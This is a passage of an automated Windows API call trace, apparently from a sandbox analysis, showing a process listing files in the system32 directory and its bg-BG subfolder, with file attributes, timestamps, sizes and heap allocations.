lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86b8ef69, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x86b8ef69, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x86bb50c9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="batmeter.dll", cAlternateFileName="")) returned 1 [0060.392] lstrlenW (lpString="batmeter.dll") returned 12 [0060.392] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7184c0 [0060.393] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b43e34, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x40b43e34, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xff749c50, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x13c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcrypt.dll", cAlternateFileName="")) returned 1 [0060.393] lstrlenW (lpString="bcrypt.dll") returned 10 [0060.393] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x715f40 [0060.393] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46f17635, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x46f17635, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xea1f1abe, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3cf50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcryptprimitives.dll", cAlternateFileName="")) returned 1 [0060.394] lstrlenW (lpString="bcryptprimitives.dll") returned 20 [0060.394] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xaa) returned 0x71a068 [0060.394] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6d4c3e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xfa6d4c3e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x6459c5f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bdaplgin.ax", cAlternateFileName="")) returned 1 [0060.394] lstrlenW (lpString="bdaplgin.ax") returned 11 [0060.394] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0060.394] lstrlenW (lpString="bg-BG") returned 5 [0060.394] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x71a120 [0060.394] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\bg-BG\\*", lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.394] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.395] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a0e36a, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc9d07ed6, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc9d07ed6, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0060.395] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0060.395] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafeccf7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcb56dfb2, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcb56dfb2, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0060.395] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0060.395] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4221919, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc45ffcbf, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc45ffcbf, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0060.395] lstrlenW (lpString="fms.dll.mui") returned 11 [0060.395] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca478364, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca8305ab, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca8305ab, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0060.395] lstrlenW (lpString="mlang.dll.mui") returned 13 [0060.395] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0060.395] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0060.395] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x71a120 | out: lpFindFileData=0x71a120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 0 [0060.395] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.395] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a120 | out: hHeap=0x6e0000) returned 1 [0060.396] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x943ab875, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x943ab875, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x81bbbef0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="bidispl.dll", cAlternateFileName="")) returned 1 [0060.396] lstrlenW (lpString="bidispl.dll") returned 11 [0060.396] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x715fe0 [0060.396] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b6860f, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd6b6860f, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x81ced1c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x29e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BioCredProv.dll", cAlternateFileName="")) returned 1 [0060.396] lstrlenW (lpString="BioCredProv.dll") returned 15 [0060.396] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa0) returned 0x718568 [0060.396] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d9a8a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8e5d9a8a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8e5d9a8a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsadmin.exe", cAlternateFileName="")) returned 1 [0060.396] lstrlenW (lpString="bitsadmin.exe") returned 13 [0060.396] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9c) returned 0x718610 [0060.396] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a972bdb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a972bdb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a972bdb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsperf.dll", cAlternateFileName="")) returned 1 [0060.396] lstrlenW (lpString="bitsperf.dll") returned 12 [0060.396] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7186b8 [0060.396] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc757d6b0, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc757d6b0, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d5fdb0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx2.dll", cAlternateFileName="")) returned 1 [0060.396] lstrlenW (lpString="bitsprx2.dll") returned 12 [0060.396] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718760 [0060.396] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74befd5, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc74befd5, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx3.dll", cAlternateFileName="")) returned 1 [0060.396] lstrlenW (lpString="bitsprx3.dll") returned 12 [0060.396] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718808 [0060.397] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7afe96b, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc7afe96b, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx4.dll", cAlternateFileName="")) returned 1 [0060.397] lstrlenW (lpString="bitsprx4.dll") returned 12 [0060.397] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7188b0 [0060.397] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89b9128, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc89b9128, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dab8a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx5.dll", cAlternateFileName="")) returned 1 [0060.397] lstrlenW (lpString="bitsprx5.dll") returned 12 [0060.397] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718958 [0060.397] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91e7c91, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc91e7c91, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dd29a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx6.dll", cAlternateFileName="")) returned 1 [0060.397] lstrlenW (lpString="bitsprx6.dll") returned 12 [0060.397] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718a00 [0060.397] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4251183, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4251183, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4251183, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="blackbox.dll", cAlternateFileName="")) returned 1 [0060.397] lstrlenW (lpString="blackbox.dll") returned 12 [0060.397] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718aa8 [0060.397] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa522d5bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0xa522d5bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0xa527987c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="boot.sdi") returned 8 [0060.398] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ce22d7, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x18ce22d7, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x661e0b30, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootcfg.exe", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="bootcfg.exe") returned 11 [0060.398] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x716080 [0060.398] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x325b7bbf, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x325b7bbf, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x14b259e0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x5450, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTVID.DLL", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="BOOTVID.DLL") returned 11 [0060.398] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x716120 [0060.398] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa480373c, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0xa480373c, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0xa480373c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x59c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bopomofo.uce", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="bopomofo.uce") returned 12 [0060.398] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4c7c82, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d4c7c82, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d4edde3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="browcli.dll", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="browcli.dll") returned 11 [0060.398] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x7161c0 [0060.398] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a679055, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a679055, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a679055, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="browseui.dll", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="browseui.dll") returned 12 [0060.398] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x718b50 [0060.398] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8455446, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8455446, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa847b5a6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthprops.cpl", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="bthprops.cpl") returned 12 [0060.398] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d8d73d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xd7d8d73d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x663849f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthudtask.exe", cAlternateFileName="")) returned 1 [0060.398] lstrlenW (lpString="bthudtask.exe") returned 13 [0060.398] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9c) returned 0x718bf8 [0060.399] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf03c839e, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xf03c839e, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x10400, dwReserved0=0x0, dwReserved1=0x0, cFileName="btpanui.dll", cAlternateFileName="")) returned 1 [0060.399] lstrlenW (lpString="btpanui.dll") returned 11 [0060.399] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x716260 [0060.399] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31a7765, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb31a7765, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3265e46, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bubbles.scr", cAlternateFileName="")) returned 1 [0060.399] lstrlenW (lpString="Bubbles.scr") returned 11 [0060.399] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a34e9a7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a34e9a7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWContextHandler.dll", cAlternateFileName="")) returned 1 [0060.399] lstrlenW (lpString="BWContextHandler.dll") returned 20 [0060.399] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xaa) returned 0x71a120 [0060.399] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8731ad6b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8731ad6b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827ee7e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWUnpairElevated.dll", cAlternateFileName="")) returned 1 [0060.399] lstrlenW (lpString="BWUnpairElevated.dll") returned 20 [0060.399] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xaa) returned 0x71a1d8 [0060.399] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2e6f4f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2e6f4f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a30d0af, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabinet.dll", cAlternateFileName="")) returned 1 [0060.399] lstrlenW (lpString="cabinet.dll") returned 11 [0060.399] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x716300 [0060.399] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c0def, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2c0def, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a2c0def, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabview.dll", cAlternateFileName="")) returned 1 [0060.399] lstrlenW (lpString="cabview.dll") returned 11 [0060.399] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x7163a0 [0060.399] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9639a6c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xc9639a6c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x663abaf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cacls.exe", cAlternateFileName="")) returned 1 [0060.400] lstrlenW (lpString="cacls.exe") returned 9 [0060.400] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x94) returned 0x716440 [0060.400] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb34a12ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb34a12ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb34ed5ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xbd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="calc.exe", cAlternateFileName="")) returned 1 [0060.400] lstrlenW (lpString="calc.exe") returned 8 [0060.400] RtlAllocateHeap (HeapHandle=0x6e0000, 